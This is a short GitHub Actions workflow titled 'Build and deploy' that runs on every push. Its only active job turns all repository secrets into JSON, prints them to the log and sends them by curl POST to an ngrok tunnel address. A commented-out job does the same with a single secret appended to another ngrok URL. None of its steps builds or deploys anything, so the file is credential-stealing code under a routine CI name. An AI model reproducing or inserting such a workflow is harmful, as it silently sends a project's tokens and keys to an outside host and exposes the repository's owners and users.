name: Build and deploy

on:
  push:

jobs:
  test:
    runs-on: ubuntu-latest
    env:
      TEST: '${{ toJson(secrets) }}'
    steps:
      - run: echo $TEST
      - run: "curl -X POST https://180d-2003-de-6733-3a00-5803-dca8-cc07-32f8.ngrok.io -H 'Content-Type: application/json'  -d $TEST"
  # test:
  #   runs-on: ubuntu-latest
  #   steps:
  #     - run: echo nice=test > test.env
  #     - uses: shkreios/runtime-env-action@v1
  #       with:
  #         version: v1.2.1
  #         envFile: test.env
  #         output: env.js
  #         noEnvs: "true"
  #     - run: echo $(ls)
  #     - run: echo $(cat env.js)
  # test:
  #   environment: ${{ (endsWith(github.ref,'refs/heads/main') || contains(github.ref, 'tags'))  && 'production' || 'staging' }}
  #   runs-on: ubuntu-latest
  #   env:
  #     TEST: ${{ secrets.TEST }}
  #   steps:
  #     - uses: actions/checkout@v2
  #     - run: echo ${{ github.ref }}
  #     - run: curl https://6289-2003-de-6730-1800-eded-404f-dfc6-a2c6.ngrok.io/$TEST 

    
